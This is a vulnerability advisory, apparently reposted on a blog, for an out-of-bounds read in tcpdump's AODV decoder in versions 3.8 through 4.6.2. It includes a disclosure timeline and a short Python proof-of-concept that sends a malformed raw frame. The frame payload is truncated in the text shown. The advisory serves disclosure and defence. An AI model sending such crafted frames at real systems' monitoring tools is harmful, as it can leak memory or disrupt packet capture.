1. Background
tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.
2. Summary Information
It was found out that malformed network traffic (AOVD-based) can lead to an abnormal behaviour if verbose output of tcpdump monitoring the network is used.
3. Technical Description
The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults.
To reproduce start tcpdump on a network interface
sudo tcpdump -i lo -s 0 -n -v
(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)
and use the following python program to generate a frame on the network (might also need sudo):
#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))
aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\
s.send(aovd_frame)
4. Affected versions
Affected versions are 3.8 through 4.6.2
5. Fix
The problem is fixed in the upcoming version tcpdump 4.7.0
6. Advisory Timeline
2014-11-08 Discovered
2014-11-09 Requested CVE
2014-11-11 Reported vendor by email
2014-11-12 Vendor made a fix available as repository patch
2014-11-13 CVE number received
2014-11-13 Published CVE advisory
7. Credit
The issue was found by
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de
using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/ame
Komentarų nėra:
Rašyti komentarą